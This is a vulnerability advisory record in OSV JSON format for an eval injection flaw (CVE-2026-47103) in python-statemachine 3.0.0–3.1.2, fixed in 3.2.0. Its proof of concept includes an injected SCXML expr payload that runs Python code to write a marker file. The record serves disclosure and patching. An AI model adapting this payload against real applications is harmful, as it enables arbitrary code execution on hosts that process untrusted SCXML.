{"id":"PYSEC-2026-506","summary":"python-statemachine SCXML \u003cdata expr\u003e Eval Injection","details":"### Summary\n\npython-statemachine 3.1.2 evaluates `\u003cdata expr=\"...\"\u003e` attributes in SCXML documents using Python's `eval()`. Any application that passes attacker-controlled SCXML content to `SCXMLProcessor` is vulnerable to arbitrary code execution in the context of the hosting process.\n\n### Details\n\n`SCXMLProcessor.parse_scxml_file()` processes SCXML documents and evaluates `\u003cdata\u003e` element `expr` attributes via the following call chain:\n\n```\nSCXMLProcessor.parse_scxml_file()\nSCXMLProcessor.process_definition()\ncreate_datamodel_action_callable()\n_create_dataitem_callable()\n_eval()\neval()\n```\n\n`_eval()` calls Python's built-in `eval()` directly on the expression string without sandboxing or restriction.\n\n### PoC\n\n```\n1. Install:\n   pip install python-statemachine==3.1.2\n\n2. Create an SCXML file containing:\n   \u003cdata id=\"x\" expr=\"__import__('pathlib').Path('marker.txt').write_text('pwned')\"/\u003e\n\n3. Run:\n   SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)\n   SCXMLProcessor.start()\n\n4. During start(), \u003cdata expr\u003e reaches _eval(), which calls eval().\n\n5. Result:\n   data_marker_before_start: False\n   data_marker_after_start: True\n   success: True\n```\n\n### Impact\n\nThis is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.","aliases":["CVE-2026-47103","GHSA-v4jc-pm6r-3vj8"],"modified":"2026-07-01T20:23:03.302193Z","published":"2026-06-29T11:50:52.079977Z","references":[{"type":"WEB","url":"https://github.com/fgmacedo/python-statemachine/security/advisories/GHSA-v4jc-pm6r-3vj8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47103"},{"type":"PACKAGE","url":"https://github.com/fgmacedo/python-statemachine"},{"type":"WEB","url":"https://github.com/fgmacedo/python-statemachine/releases/tag/v3.2.0"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/python-statemachine-rce-via-scxml-eval-injection"},{"type":"PACKAGE","url":"https://pypi.org/project/python-statemachine"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-v4jc-pm6r-3vj8"}],"affected":[{"package":{"name":"python-statemachine","ecosystem":"PyPI","purl":"pkg:pypi/python-statemachine"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.0.0"},{"fixed":"3.2.0"}]}],"versions":["3.0.0","3.1.0","3.1.1","3.1.2"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/python-statemachine/PYSEC-2026-506.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"}]}